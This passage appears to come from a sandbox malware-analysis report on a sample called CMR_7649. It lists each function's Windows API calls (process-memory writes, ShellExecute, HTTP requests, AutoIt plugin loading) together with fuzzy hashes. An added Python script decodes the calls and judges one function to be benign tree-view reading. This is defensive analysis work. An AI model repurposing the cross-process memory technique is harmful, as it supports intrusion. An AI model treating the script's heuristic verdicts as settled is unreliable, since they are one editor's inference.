                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
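The API sequence in the record above (GetWindowThreadProcessId, OpenProcess with access mask 0x438, VirtualAllocEx with type 0x1000 and protection 0x4, WriteProcessMemory, ReadProcessMemory, and SendMessageW with message IDs 0x1104 and 0x1111) is worth decoding rather than reading the "writes to foreign memory regions" signature at face value. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It takes the API lines exactly as printed in this record (embedded as constructed input), decodes the access mask, allocation type and page protection against the winnt.h values, maps the two message IDs to their commctrl.h names, and produces a verdict. The verdict strings and the rule "executable protection in a foreign process = injection candidate" are the editor's heuristic; the reading of this function as a cross-process buffer for SysTreeView32 messages (the AutoIt runtime idiom) is an inference from the AU3_GetPluginDetails import and control class names that appear in later records, not a statement the report makes.

```python
import re

# Constructed input: the "APIs" lines of the function record above, copied as
# printed by the report. Not a live capture.
RECORD = """\
Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
"""

# Win32 constants (winnt.h / memoryapi.h / commctrl.h).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
ALLOC_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
TV_FIRST = 0x1100
TVM_MESSAGES = {TV_FIRST + 4: "TVM_GETITEMRECT", TV_FIRST + 12: "TVM_GETITEMA",
                TV_FIRST + 17: "TVM_HITTEST", TV_FIRST + 62: "TVM_GETITEMW"}

# Matches "Api.MODULE(arg,arg,...), ref: XXXXXXXX" in a report line.
CALL_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]{8})")


def parse_calls(text):
    """Return [(api, module, args)] where args are ints, or None for '?'."""
    calls = []
    for api, mod, argstr, _ref in CALL_RE.findall(text):
        args = [None if a.strip() == "?" else int(a, 16)
                for a in argstr.split(",") if a.strip()]
        calls.append((api, mod, args))
    return calls


def decode_mask(value, table):
    """Expand a bit mask into constant names; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return names


def classify(calls):
    """Decode the cross-process memory calls of one function and rate them."""
    apis = {api for api, _, _ in calls}
    out = {"opens_process": None, "alloc": None, "protect": None,
           "messages": [], "verdict": None}
    for api, _, args in calls:
        if api == "OpenProcess" and args and args[0] is not None:
            out["opens_process"] = decode_mask(args[0], PROCESS_RIGHTS)
        elif api == "VirtualAllocEx" and len(args) >= 5:
            if args[3] is not None:
                out["alloc"] = decode_mask(args[3], ALLOC_TYPES)
            if args[4] is not None:
                out["protect"] = PAGE_PROTECT.get(args[4], hex(args[4]))
        elif api == "SendMessageW" and len(args) >= 2 and args[1] is not None:
            out["messages"].append(TVM_MESSAGES.get(args[1], hex(args[1])))

    writes = {"VirtualAllocEx", "WriteProcessMemory"} <= apis
    executable = out["protect"] in ("PAGE_EXECUTE", "PAGE_EXECUTE_READ",
                                    "PAGE_EXECUTE_READWRITE")
    if writes and executable:
        out["verdict"] = "executable memory written into a foreign process: code injection candidate"
    elif writes and "ReadProcessMemory" in apis and any(m.startswith("TVM_") for m in out["messages"]):
        # Non-executable buffer, read back after tree-view messages: the struct
        # marshalling a SysTreeView32 reader (e.g. the AutoIt runtime) needs.
        out["verdict"] = "read/write buffer marshalled for SysTreeView32 messages, not code injection"
    elif writes:
        out["verdict"] = "foreign-process write with non-executable protection"
    return out


if __name__ == "__main__":
    result = classify(parse_calls(RECORD))
    for key, value in result.items():
        print(f"{key}: {value}")
```

The mask 0x438 decodes to PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, which is exactly the set needed to allocate, write and read a buffer in another process and nothing more (no PROCESS_CREATE_THREAD). Together with PAGE_READWRITE and the TVM_GETITEMRECT / TVM_HITTEST messages, whose lParam must point into the target's address space, this function reads tree-view state out of another process rather than planting code in it; a triage analyst should spend their time on the records with executable protections or remote thread creation instead.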
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \$]$h
                                                • API String ID: 4104443479-3262404753
                                                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                APIs
                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                • String ID: <$@
                                                • API String ID: 2417854910-1426351568
                                                • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3705125965-3916222277
                                                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                APIs
                                                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem
                                                • String ID: 0
                                                • API String ID: 135850232-4108050209
                                                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID: AU3_GetPluginDetails
                                                • API String ID: 145871493-4132174516
                                                • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 3375834691-2298589950
                                                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: $<
                                                • API String ID: 4104443479-428540627
                                                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume
                                                • String ID: \VH
                                                • API String ID: 2507767853-234962358
                                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
